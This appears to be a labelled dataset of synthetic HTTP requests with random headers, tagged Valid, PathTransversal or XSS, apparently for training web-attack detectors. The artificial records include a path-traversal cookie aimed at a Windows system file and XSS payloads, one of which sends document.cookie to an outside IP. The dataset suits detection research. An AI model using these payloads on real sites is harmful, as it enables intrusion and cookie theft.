Upgrade: wsgnwl/0.0, 7nltw/5.0, 7ai/7.4, rhRh/3.3, eMvtpm/2.1
Warning: 082 www.cyawd.gif "ulhshseXosaHnh3a" "Wed, 29 Jun 05 18:19:58 CET"
X-Forwarded-For: 125.30.59.190
X-Serial-Number: 585140076554
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16734
Start - Id: 18054
class: Valid
GET /lQClnL2VC1VBubykuf/K6x.JpY6YNRCy/un7x/dfziari/b6hsgydTnaeamsr/poNgnre/McbLwUlsV-x/aMtA_hJuo0wxZMN/4pZEpZx8A@@eCJ8j/nOJp/eV4vQ/dyc.js?hshvdeoj2ien=tZyHL4.1&beHuWsNZzRlikek=ldrstyle&ZWJ-9ZzbJQ=huz&nde=s01puoegaeuoJaeca HTTP/1.0
Host: 42.9.169.232
Connection: Soomilns
Accept: application/postscript, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-stale=15
Client-ip: 248.57.188.27
Cookie: VZEYyOsZ=6pjLXKwxR
Cookie2: $Version="013"
Date: Wed, 15 Dec 04 02:54:06 CET
ETag: "o0vR8yoTG.YYTT@0Q"
Expect: 100-continue
From: ubo9@noxriwRe.cz
If-Modified-Since: Thu, 25 Dec 08 11:19:12 UTC
If-Unmodified-Since: Sun, 24 Dec 06 01:59:21 UTC
If-Match: "6pEgER76o7_X4HJtH5t"
If-None-Match: *
If-Range: *
Max-Forwards: 18
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: bcaex ekt5=aiebrsie
Authorization: Basic c3phaWJuem86c2NlaDRu
Range: -498682,294755-,-12868
Referer: /tnnoAtsu/ipxoA/seao.tar
TE: gzip
Trailer: If-None-Match
User-Agent: ruwadu/4.2.0.1
UA-CPU: PowerPC
UA-Disp: 9424,5309,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 258x9628
Via: HTTP/2.7 156.116.215.200
Transfer-Encoding: gzip
Upgrade: tnau/0.7, Rsss/5.2, lts4/0.6
Warning: 163 www.s3rn.jpeg:50 "nRwkzetnteAhAoF" 
X-Forwarded-For: 169.12.78.179
X-Serial-Number: 60954
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18054
Start - Id: 8803
class: Valid
GET /onc0ej1iatvlSlteffeI/SdfeioElqmLkoyAose/yeoaDH/ckryueneagdeaei9os/myR6sNkvei/o8ZHsAF_x2LEI1agtu9/L2G/DdtiNous/m2lUE/tOL1tG1h@f/mCi7KbN4/o85Ypv.nsf?55exec8ZWic01bC=094575&lae=%2FrAu04tenhe&wostrenCuwo=2283&metabJservicestD@NckC0=nformvwaj+ktyswujt&eare9lttdhoeorR=tchome&bheco9rmvc=e&d6thNoho=ntreshe2%3DWeUR&mpneOenlEn=ijnht1reemeaarhng&isehhpyo5e=ts&oneesaNeu=3568901&edlREES.=a6bu8l&eis5tnseOatrf=%3Fz6&AsMdodqdtO4c=2passwd&1Irslect4e=iinnophm4w HTTP/1.1
Host: 151.107.160.5:45622
Connection: alro
Accept: text/plain;q=0.5, application/zip, video/*;q=0.8
Accept-Charset: *
Accept-Encoding: deflate, identity, gzip, deflate;q=0.1
Accept-Language: tgt-0tht, 0ysme-srsano;q=0.1, sibai-tnE0ee;q=0.8, EqhOe-hruhlBbh;q=0.6
Cache-Control: no-store
Client-ip: 13.13.235.187
Cookie: ad0vEcesttateo=ire;rMlt3=lcpmZr;mscdw3=Tiuecs9yqe;aA6tl=naraw;@Pk4u=cESs;dib=WsNit
Cookie2: $Version="370"
Date: Wed, 28 Jul 04 03:24:31 GMT
ETag: "tWB0BtGgKIOW9@5ro"
Expect: 100-continue
From: feered@asls8twn0.it
If-Modified-Since: Mon, 03 Jan 05 13:28:47 UTC
If-Unmodified-Since: Mon, 07 Apr 08 23:53:09 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 17 Apr 04 15:42:08 CET
Max-Forwards: 5711
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="locenctt"
Authorization: Digest nc=5ECEECf6
Range: -807244
Referer: /qvier/Teihsa/mro7lA.aspx
TE: trailers
Trailer: Date
User-Agent: tyiacte (o.K5uA.dFM)
UA-CPU: 68000
UA-Disp: 347,7346,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 7482x1972
Via: FTP/8.5 www.a3oRamt.css
Transfer-Encoding: gzip
Upgrade: ohe/2.6, oaa/8.5
Warning: 442 www.Bhp9s.jpeg "ent7orsmhitOM" 
X-Forwarded-For: 71.221.125.93
X-Serial-Number: 28573562
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 8803
Start - Id: 17401
class: Valid
GET /rR/weeiaetsswdoiuaacel/uN2rg9Dixp_f/bmlsamecedRd/ectB7mto/siatse/tw6Qto0esaosto0/gV@F/m7eead6ot4se/i-YPLm2BkAx/rVnKnEcFs8PRC_7/i3NRaySM.php3?ycdnwnta=replacesxt&riz=yrbn%29&eyhaejiu5eN=5664&3dhhiho=Hh&smdqdsadeaao9a=8225&ttosusHBIrPcn2=iwaezrnodi&f2ensetasl=bgsound%26&hivofpblu=3254&@8A0U4au=0997203&ers2eleplancetd=71739&teinIraFel=ub HTTP/1.1
Host: 11.236.47.171
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: identity;q=0.7, identity, identity;q=0.8
Accept-Language: *;q=0.3
Cache-Control: max-stale
Client-ip: 75.225.170.204
Cookie: G4Hrr6M=Hi8ti$ht2;Sbn=$~o
Cookie2: $Version="155"
Date: Fri, 01 Dec 06 05:15:20 GMT
ETag: "z4Z4bHKFVo@_OqY"
Expect: 100-continue
From: hErN7au@nLt0ryhez.uk
If-Modified-Since: Mon, 09 Mar 09 22:51:00 UTC
If-Unmodified-Since: Fri, 27 May 05 12:49:59 UTC
If-Match: "8wcDJ@DAVy-_zGRp4c"
If-None-Match: "lJgUZ@rNFdmhCFgFI"
If-Range: Sun, 31 Jul 05 23:22:16 CET
Max-Forwards: 712
MIME-Version: 4.7
Pragma: e=etatarpw
Proxy-Authorization: NTLM ZWFubGU1aGUwOXJucmFyYXNwSGNvaGEwc2JhQmlvb05wSWVycWJlQWQ=
Authorization: t6xg vnemu=gNfea
Range: -29
Referer: http://ctsTn.net/rshoI.aspx
TE: deflate
Trailer: Cache-Control
User-Agent: Mozilla/4.0 (Windows; U; Win98 3.5; oL-sn; rv:3.9.2) Gecko/88693907
UA-CPU: 68000
UA-Disp: 436,9131,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 429x433
Via: HTTP/3.0 55.116.228.144, FTP/0.1 142.173.8.119:535, 5.3 230.95.222.156
Transfer-Encoding: compress
Upgrade: erw/4.0, sapde/3.7, pa5e/2.8, u1osod/3.8, getnE/3.2
Warning: 500 www.ietLLq.png "WitpeagmraOeteXfnE" "Fri, 22 Feb 08 21:37:25 CET"
X-Forwarded-For: 208.220.17.9
X-Serial-Number: 534036492924791
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17401
Start - Id: 33469
class: Valid
PUT /ibe/jAnflp2rc56IlbPA/wBlb5vy/hZBgT3NOFdvBM/all65XXWnbinsF.cfm? HTTP/1.0
Content-Length: 5
Content-Language: c1orZs,efduefla
Content-Encoding: gzip
Content-Location: /eljis/oarivv/gW9idTrh/neTno.msf
Content-MD5: Y2VkbmU1SGllYXRkbGFlVA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 30 Mar 07 08:38:10 GMT
Last-Modified: Fri, 20 Mar 09 20:07:02 UTC
Host: 206.17.112.198
Connection: tThae
Accept: text/html, text/*;q=0.6
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: ds-hs52Td;q=0.4
Cache-Control: eeg='otnlE'
Client-ip: 88.3.221.168
Cookie: k4ewaxntenrir=t eapassthru;dv=ie;ogseo=mr6tasnmmTed;wdatfnOth=cIf6pdAYei;w-vgeDRti=snullc= linkthedT7u8\hn8e
Cookie2: $Version="953"
Date: Sun, 18 Dec 05 07:21:35 GMT
ETag: W/"zId7Lx4UCG_v_bT"
Expect: sabIt=etatnae;Aeesoun=3lr2Eo
From: arra@bopdn.biz
If-Modified-Since: Wed, 18 Aug 04 19:12:43 UTC
If-Unmodified-Since: Thu, 05 Aug 04 17:37:10 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 25 Mar 08 14:19:20 GMT
Max-Forwards: 6
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest cnonce="strTo"
Range: 408-106,8887-956063
Referer: http://www.dled.de/tdi4d5i/5tii/EOtn6e/Aqeysc/ybAth.fgf
TE: trailers,trailers,trailers
Trailer: Accept
User-Agent: dgqisrhs7arbr
UA-CPU: Sparc
UA-Disp: 0089,4532,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 4154x581
Via: nbnaie/7.1 www.lf9cse.htm
Transfer-Encoding: gzip
Upgrade: tbkjy/9.3, M3wzc8/5.0, too/6.5
Warning: 657 165.58.231.168 "oeofT8kteyMTk0" 
X-Forwarded-For: 24.33.216.151
X-Serial-Number: 944908095975390
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rv=dd

End - Id: 33469
Start - Id: 419
class: Valid
GET /.nodeGiF/3FlpdmiNhtpassw_ermm/sxAzGohgG18.FF2t4/pinsafe/iObp0O_rI22A/_KyD6@binmW/Decho.h_9Cincludej7Y8l/abx/_wHhz1Hq7.png? HTTP/1.0
Host: 248.250.161.119
Connection: keep-alive
Accept: application/*;q=0.0, application/*, audio/*
Accept-Charset: x-mac-chinesesimp;q=0.6
Accept-Encoding: 
Accept-Language: OtgyT-0zqtpif;q=0.8
Cache-Control: only-if-cached
Client-ip: 253.172.216.224
Cookie: 13iYv6ELR=h
Cookie2: $Version="17"
Date: Tue, 09 Jan 07 12:35:57 CET
ETag: "S0COAidTeioOfvMcFn0"
Expect: 100-continue
From: enIsusc@saoftwhhea.net
If-Modified-Since: Sat, 03 Jul 04 06:27:18 GMT
If-Unmodified-Since: Wed, 13 Jan 10 07:06:33 CET
If-Match: "wgXFZ02@LKHzvr04aWf"
If-None-Match: "JELitddlCrvVfZPFu"
If-Range: Sat, 20 Aug 05 08:56:22 UTC
Max-Forwards: 744
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: 6nlOpg rtnm=stbdwR
Authorization: reSmaG iooeb2=sinifhAE
Range: 95586-,-851,-5894
Referer: http://cEe9en4F.it/Y7nn/t7Imscki/alee/nmya6.mp3
TE: trailers,gzip
Trailer: Trailer
User-Agent: ose7ne (i_2TCa; nlN04q@Y; tPE@ViPWkS)
UA-CPU: Sparc
UA-Disp: 810,8513,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7545x2141
Via: HTTP/1.3 30.79.73.213:8, 8.1 174.152.70.123
Transfer-Encoding: gzip
Upgrade: t3uow/0.2, 6nnat/6.0, iR9/7.3, tts/0.0
Warning: 942 91.154.237.154 "h59jnrdncehalTSdatn" "Tue, 19 Oct 04 16:05:21 GMT"
X-Forwarded-For: 117.218.252.232
X-Serial-Number: 5470041402
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 419
Start - Id: 20529
class: Valid
GET /gb.vGm/eiEzd7m/6LlsCD.Oel-/PD01IuSgiR@ELor/i461p7jay6c0E/arHooe6gsnwnntci/r0P18WLE6fZq@72ak/pmoiU8ictie/fZiEL5RgJ0jvlD5jOj.html? HTTP/1.1
Host: www.aohD.gov:6387
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-8859-8;q=0.6, cp-936;q=0.4
Accept-Encoding: identity
Accept-Language: *
Cache-Control: no-transform
Client-ip: 109.69.212.119
Cookie: EBdrRliriw6fab=aetycoDmno;vwiee=hrmar;ce8niusp=23312764;lEieidaate5oe3S=9r8-8qDNKVfx;8r=329889;ci1wemHrAdi=2610367930
Cookie2: $Version="88"
Date: Tue, 18 Oct 05 13:32:33 UTC
ETag: W/"H9HATn4wvtevWS-kYLzg"
Expect: t1la=2usu
From: m4Ilxlpt@rise1wePl.it
If-Modified-Since: Mon, 07 Apr 08 13:11:57 CET
If-Unmodified-Since: Tue, 19 Feb 08 07:45:45 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 24 Sep 08 07:25:27 CET
Max-Forwards: 9
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: NTLM bkVoSWFhbXRWcjlrZXlyaWVlbGdobG9lckl0ZW43ZTFzZWxlcjdmM2lob2l2ZXBP
Authorization: Digest opaque="wrot0"
Range: 922388-,667-,-2130
Referer: http://4eiri6s.ch/rhtet/Uta48t/mdtsae.msf
TE: trailers
Trailer: From
User-Agent: Mozilla/3.9 (Windows; U; WinNT 5.2; 5g-tE; rv:5.0.7) Gecko/80998364
UA-CPU: StrongARM
UA-Disp: 9823,4223,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5447x066
Via: ryed5o/0.6 128.155.43.246, FTP/6.2 www.nvtua.js
Transfer-Encoding: identity
Upgrade: aOnbin/5.3, cUojlc/5.1
Warning: 508 www.tpobco.jpg "aou9O" 
X-Forwarded-For: 55.186.171.144
X-Serial-Number: 48113953855
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 20529
Start - Id: 45330
class: PathTransversal
GET /hisz/jOSP6s/sovsuborooyaoseh/IOa9otrpnnslsrn0aaj/bwCcoqzgRF9wDoS0wO/npIwbOt3XN_ZIyn.php?eo=exae3er2hrsseE&scNneee=Irn%29h%25sWtbe%2F%28q9%3Eoe&mirspCyonntro=ce&0gsoph=0&tiaL0e=7oa&e1ebeu2hldo2c=585622&alHselw=h%26+TcmdOgt2&sb=%2Ba%7C%25&cs=23002 HTTP/1.0
Host: www.esto.gov
Connection: 4itaib
Accept: */*
Accept-Charset: x-mac-korean, utf-8, euc-cn;q=0.8, euc-tw, big5;q=0.4
Accept-Encoding: identity, gzip;q=0.2, gzip, compress;q=0.4
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 107.243.204.240
Cookie: mSeecooon=../../../../../../WINNT/autoexec.bat;rldvteeE=p1g
Cookie2: $Version="39"
Date: Wed, 19 Apr 06 01:15:51 CET
ETag: W/"Y6zgKIUkHVPA06Fw@"
Expect: 100-continue
From: ytue@relttbTc.it
If-Modified-Since: Sun, 20 Jun 04 20:19:42 GMT
If-Unmodified-Since: Sun, 11 Jan 04 24:07:02 CET
If-Match: *
If-None-Match: "QDYidqsP0a14odW6rJ"
If-Range: "KzG6YWxDEct2uYB"
Max-Forwards: 709
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: Digest response="ed8dfEc306DDbBD0ba58b281AD1168bF"
Authorization: NTLM dWFhZmR0ZXB2Ym5yNThpdHJuc3VsMjZpODZEYXNoZWFvb2VzdQ==
Range: 7666-,8763-,324-
Referer: /sndmSnn1.css
TE: chunked;q=0.1,trailers
Trailer: If-None-Match
User-Agent: t1NnUliPl1 http://www.delfkx.com
UA-Disp: 313,563,8
UA-Color: color32
Via: FTP/4.2 www.s9ymo.htm
Transfer-Encoding: compress
Warning: 572 53.176.11.66 "rlsnPeqEeeRturtds2" "Sat, 27 Jan 07 23:51:32 CET"
X-Forwarded-For: 86.225.57.136
X-Serial-Number: 341978779570501

null

End - Id: 45330
Start - Id: 47934
class: XSS
GET /documentMvarD5scriptsTL8Ia/u6d@CqXMfUGh-c.shtml?0inmh7deen3ti=557487&VreeUrrssro6a6=w3iosfesI3yftptpw&lM=zPTa6W&TwDwhereG_p=%3Cdiv+++++style++%3D+++%22++behaviour%3A++url%28%5Bhttp%3A%2F%2Fwww.si.com%2Fscript%2FUwsRJcu.swf%5D%29%3B+++++%22++++%3E&WyF0=8729&aeElceexfeam=reg51sTastdin0mv%40&oeCZa=6984&rrjrbiusnMvCg=85883732&npihnfOnm=n HTTP/1.1
Host: 246.185.224.50:80
Connection: Qttm
Accept: */*;q=0.5
Accept-Charset: windows-1255, x-mac-japanese
Accept-Encoding: identity;q=0.3, compress;q=0.3, gzip, identity;q=0.6, compress
Accept-Language: Er7g-eer, nhjcHFD-rgnAhpUj, e-7BLo, bnudtE-ncmoOhbP;q=0.5, eS-kH
Cache-Control: no-cache
Client-ip: 99.239.86.40
Cookie: oek2jwtetpxq=oipwau;yiair1=e;F4yX=1;tmqqdeittreteea=ep)i;ceemocacd5Dzuaq=vcps dwinnta5 /jbpe?u9ej;evu1C@Gz5telnet2= ostyle1
Cookie2: $Version="613"
Date: Fri, 25 Sep 09 05:25:59 CET
ETag: "ftjXL.qa9aDa_vAZ2I5K"
Expect: on3be5=iadbe;seabhe=eetaKcek
From: Eawmtren@tifsCoeGen.net
If-Modified-Since: Mon, 04 May 09 08:44:10 UTC
If-Unmodified-Since: Sat, 01 Nov 08 03:38:33 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 07 Aug 07 01:36:24 UTC
Max-Forwards: 5120
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: Digest username="nitesrhd"
Authorization: NTLM aTlvUnNwZGdycnNibWVucmF5bnR0aXRod2NpZDhpQ2U=
Range: 82-,097137-575
Referer: /greszenl.mpg
TE: trailers,gzip;q=0.8
Trailer: Max-Forwards
User-Agent: Mozilla/1.9 (compatible; MSIE 5.2; Linux i586; epSer; en5nieLdh; rter7eu)
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 929x206
Via: 9.9 217.215.191.236:77772, 21dee/5.3 www.mhaqwte.jpeg
Transfer-Encoding: deflate
Upgrade: rmhmkL/0.0, a6ssth/8.0, pto/4.4, edcoWe/0.0
Warning: 074 www.lhduar.css "seste7nmh6" "Tue, 21 Sep 04 11:27:26 UTC"
X-Forwarded-For: 108.243.93.109
X-Serial-Number: 99981818426626
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47934
Start - Id: 26880
class: Valid
GET /cxBbpvOLjMvspNdv/yNFrzEwFZWY75QopHj1/2saqqn.exe?skl1drljdewTmf=tcdsaerx&29RE47=fC92O1vb9UQ&nocsrcM7e5r3hng=aaoh3ltDnbs&rhdeednmqT8nl=ef&jmodfHeta=3145&lhodeDrhtSRt=fyrreanr%3B%2FmX HTTP/1.0
Host: 45.255.27.106
Connection: keep-alive
Accept: text/html;q=0.8, video/quicktime, application/postscript
Accept-Charset: windows-1258;q=0.7, x-mac-turkish;q=0.7, hz-gb-2312, euc-tw
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 42.185.253.58
Cookie: pkwB=toafW7Xk83;ofuic=n0wHuIOePY;fdaedh=eo;tIhdihqt=2os
Cookie2: $Version="80"
Date: Thu, 15 Dec 05 01:11:38 CET
ETag: "IAtnXv67SoAZSEy5b_z"
Expect: elEaodAe=2dpdste
From: eaaum3ie@Tern.net
If-Modified-Since: Wed, 18 May 05 24:03:34 GMT
If-Unmodified-Since: Wed, 14 Jan 04 10:28:29 GMT
If-Match: "sdGL59T4-UnmU2mo"
If-None-Match: "y-kmSFng_7oSU7mJi"
If-Range: "O3ANKFqv_j6-9eA."
Max-Forwards: 6350
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: Basic YWlhZ2ZBcjo1bXJldQ==
Authorization: Basic cmJlaXRtZG86dHJzSG0=
Range: 2669-620
Referer: /nAaheaid/te8aarf/pto0seT/5Eivrsz/e6exoei.nsf
TE: gzip;q=0.3,trailers,trailers
Trailer: Max-Forwards
User-Agent: daIotei (rYjxwl08; zyBMQu6cT0; yQMwrXtGs)
UA-CPU: StrongARM
UA-Disp: 1462,2709,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 9814x1840
Via: HTTP/5.4 www.zeea.html, HTTP/7.0 www.onapels0.jpg, FTP/7.6 80.9.83.152
Transfer-Encoding: deflate
Upgrade: mhdhoc/5.7, iii/0.3, OdSnsv/0.4, egRm/2.5
Warning: 297 www.mw6loneh.png "otAjosweset" 
X-Forwarded-For: 225.193.121.240
X-Serial-Number: 68664107203
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26880
Start - Id: 2138
class: Valid
GET /rNGu-7_OKJJ4/Q.HMKY.png? HTTP/1.0
Host: www.taim.gov
Connection: close
Accept: image/png;q=0.2, video/*;q=0.0, text/plain
Accept-Charset: gb2312, x-mac-roman;q=0.5, iso-8859-5
Accept-Encoding: *;q=0.8
Accept-Language: yeDT-qehyei1a;q=0.3, qc-eenu0, N-mRiL, dju-bE;q=0.0, oogm7Ott-kame;q=0.7
Cache-Control: hYeizetl='hueDo'
Client-ip: 52.80.212.176
Cookie: m5unt=725171;sdmT=drvq2m;dlobln9demqi=0sfrefhon3ehub;2yiEu3=nyMnX5_b;E-neiU=9255
Cookie2: $Version="140"
Date: Thu, 24 Jul 08 05:14:45 CET
ETag: "HwVoitF.9dVMW9GD"
Expect: 100-continue
From: m5h3d@tewicbp3ee.be
If-Modified-Since: Fri, 12 Mar 10 05:08:49 GMT
If-Unmodified-Since: Mon, 23 Aug 04 08:15:24 CET
If-Match: "cRuB4Oi3Erf8B3DW-"
If-None-Match: "56EmPlz9@iPWUK2N"
If-Range: "MczHR6.4ajOOlHMa8JSx"
Max-Forwards: 40
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: htvp2s zeui=5aihmEt
Authorization: NTLM YUh3YXBpc3Jrbzdkc2hvZWhldTQzbzFuNmhpZWVlZVBobWVuNHRldHRuZWE3ckU=
Range: 9797-
Referer: /el9ettt/hlsmTI/r8tvt3/ceain9m/aEtorelR.swf
TE: trailers,chunked,trailers
Trailer: Warning
User-Agent: jbg3ybIhd/4.6.5
UA-CPU: MIPS
UA-Disp: 1987,388,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 539x1521
Via: FTP/2.6 25.85.157.1, 6.9 www.eieatee.shtml
Transfer-Encoding: identity
Upgrade: LqnoEm/4.0, 2Odnr/2.0, ioip/3.7, qMe/8.4
Warning: 103 16.229.84.252 "ansoitetCmtnv8" 
X-Forwarded-For: 209.131.51.221
X-Serial-Number: 9895241717803854226
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2138
Start - Id: 8311
class: Valid
GET /e.w4T@izC/ttkni5betboedt2a/iDPQTjT2EQtqlr/d2hsn/syr/dv__t77@.pl?gqKjs2UI=437&a4biar2sOiiebqa=5meyGKoalmBnsn&rnxatirSttcbt=+lde8&ntfo=2300&arakmi3me2nlh=%7Ei%5D HTTP/1.0
Host: 34.187.134.210
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: taf-0L9, 9hee-m, 2yn-ndee, hrtsgr-s, ilTh-9r5aoitl;q=0.6
Cache-Control: max-age=0003
Client-ip: 46.174.173.182
Cookie: 7bincludesSACLNX=t
Cookie2: $Version="8"
Date: Fri, 09 Jun 06 16:23:55 GMT
ETag: "G@PdRo7ZT3D5GJ6d"
Expect: an8N=fteo;a5r0vn=nmngS
From: vAneoO@xoHsahh.it
If-Modified-Since: Thu, 14 May 09 03:55:47 UTC
If-Unmodified-Since: Sat, 17 Apr 10 01:20:42 CET
If-Match: *
If-None-Match: "azpOG2U0ff_f9W5Cg3k"
If-Range: "wjnXpmUWRKd5RO7"
Max-Forwards: 182
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: gnEJt tans=e5Re
Authorization: Digest response="48B0BE168EB1d56a3c6d53dBE7baDCF0"
Range: -8236,5-800
Referer: http://www.Zay9i.com/sax2ana/xenS/iyiae6/SGdewes4.mpeg
TE: gzip,deflate;q=0.8
Trailer: If-Range
User-Agent: eMOinfHa
UA-CPU: x86
UA-Disp: 858,824,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 138x587
Via: HTTP/7.6 www.imflH.htm, 8.2 www.deceed.png, HTTP/3.8 53.137.25.124
Transfer-Encoding: deflate
Upgrade: rREn/2.9, di70e5/6.8, Oae/2.0, tCr/0.8, vn7low/5.7
Warning: 477 203.254.244.133:8 "Cspr5Osssgcfn" 
X-Forwarded-For: 35.25.216.107
X-Serial-Number: 7108869767908
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8311
Start - Id: 30836
class: Valid
GET /fW0rt-rZ.q7MY1NkJmX.dll?cnislo4Tswmmoeh=54836503&aipyAb3o=ervX4T_UaWr&ra9mheg7ezeee=54 HTTP/1.1
Host: 68.129.75.139:6340
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: T5mro-hstt;q=0.7, no7mialy-eqrster
Cache-Control: max-age=0908
Client-ip: 63.78.197.96
Cookie: lw=re;lan=8041;7G4passthru=orltgquttnroehomea;h4dgacIikxuh=pi+spret1oe(trs;YqTo=Seautoexecseeuhl;jehnhreeHlcicft=dd3t
Cookie2: $Version="369"
Date: Fri, 28 Dec 07 11:27:39 UTC
ETag: W/"woMjTGCwWRMsMt9g"
Expect: ntnts
From: emai@qjb6cGS.org
If-Modified-Since: Tue, 15 Sep 09 17:19:53 CET
If-Unmodified-Since: Mon, 16 Jun 08 12:45:48 CET
If-Match: *
If-None-Match: "BchcDKA_cWABQHPnEwZD"
If-Range: *
Max-Forwards: 89
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Bb9d hdnpTo6=rnIfs
Authorization: Digest uri=http://1pyywe.de/noemeoai/etncetl/nofGhd/aest/8udtal.png
Range: 532-
Referer: http://www.3tEne.net/dCjmdp/tiiept/6Qawhjt/trrrmq.ace
TE: trailers,trailers,gzip;q=0.7
Trailer: Connection
User-Agent: Mozilla/7.7 (compatible; Konqueror/1.5; Open BSD i586; cAe1no2ai)
UA-CPU: MIPS
UA-Disp: 072,6639,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8282x452
Via: HTTP/2.3 213.180.91.145
Transfer-Encoding: compress
Upgrade: i1dhw/0.5, 7nnt/5.7
Warning: 487 www.3aeuzssp.html "5daxrei" "Sat, 28 Apr 07 04:33:31 UTC"
X-Forwarded-For: 37.25.72.3
X-Serial-Number: 940026202382470481
----: ----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 30836
Start - Id: 47396
class: XSS
GET /Uthc/mbA.E.l7Bw6/lzLhinoyxldNA.pl?zJe605=96952&VU1bHYPR54=088&F4-F97=210953&AzAPIz=%3Ciframe++src+++%3D%22+++++vbscript%3A%5Bwindow.open%28%27http%3A%2F%2F129.123.7.121%2Fmeti.dll%27%2Bdocument.cookie%29%3B%5D++++%22+%3E&eobdEpe5r5Ta1t=58&yeqtersnhee=9680&irwt=eziXDvn&65a9pzoea=ocgaio+sHq1et&tdeshe=61908088&EscriptGrY=eaeecfrhotesT2c8 HTTP/1.1
Host: www.dCreIulo1e.uk
Connection: keep-alive
Accept: application/*;q=0.6, application/*, audio/x-wav;q=0.1
Accept-Charset: isiri-3342;q=0.3, utf-8
Accept-Encoding: identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 162.119.135.49
Cookie: hsiaepnd=e94l;oiai9l8cun5Niee=gLmjg5qWo0;isbaRoegee=qcwi6I9aeT
Cookie2: $Version="57"
Date: Tue, 28 Nov 06 06:28:49 GMT
ETag: W/"Zs@tcgHlxs@J9KnP77n"
Expect: 100-continue
From: iszdhne@t6e8rl.be
If-Modified-Since: Fri, 27 Mar 09 24:17:48 UTC
If-Unmodified-Since: Fri, 16 Sep 05 21:30:18 GMT
If-Match: "IGzop34q3uPZrSr"
If-None-Match: *
If-Range: Sun, 01 Nov 09 02:51:13 GMT
Max-Forwards: 5
MIME-Version: 0.3
Pragma: u='a'
Proxy-Authorization: cHest eInm=wotttdoe
Authorization: nltq a0s8=xoEe
Range: 5469-3,1126-
Referer: http://www.EnYem.net/hbeo2erw.html
TE: chunked;q=0.3,gzip;q=0.2
Trailer: Expect
User-Agent: Mozilla/1.4 (X11; U; Solaris 9.3; ut-et; rv:5.0.1) Gecko/38047659
UA-CPU: StrongARM
UA-Disp: 0322,0692,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 1670x058
Via: HTTP/8.2 www.cesEt6.css:17, 2.4 117.124.89.41:87271, 3.6 www.7tgnfle.jpg
Transfer-Encoding: gzip
Upgrade: uns/4.6, rb2/9.4, tsywas/1.7, Onrj/5.3, anii/8.9
Warning: 270 120.123.100.132 "hvi74Edbooyr" "Mon, 07 Jan 08 14:05:19 UTC"
X-Forwarded-For: 39.101.79.171
X-Serial-Number: 6529673477463
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47396
Start - Id: 9630
class: Valid
GET /PiWkQRR9wgetn8/lR3R_gI9I1/r2o8vNuImc/eEFvnc/rxKz6rPwIpiMWhoL/nCL/4F.shtml? HTTP/1.1
Host: 161.141.80.171
Connection: keep-alive
Accept: text/*;q=0.3, video/quicktime
Accept-Charset: euc-jp;q=0.0, x-mac-japanese, iso-8859-2, cp-932;q=0.0, hz-gb-2312;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=01446
Client-ip: 192.221.57.112
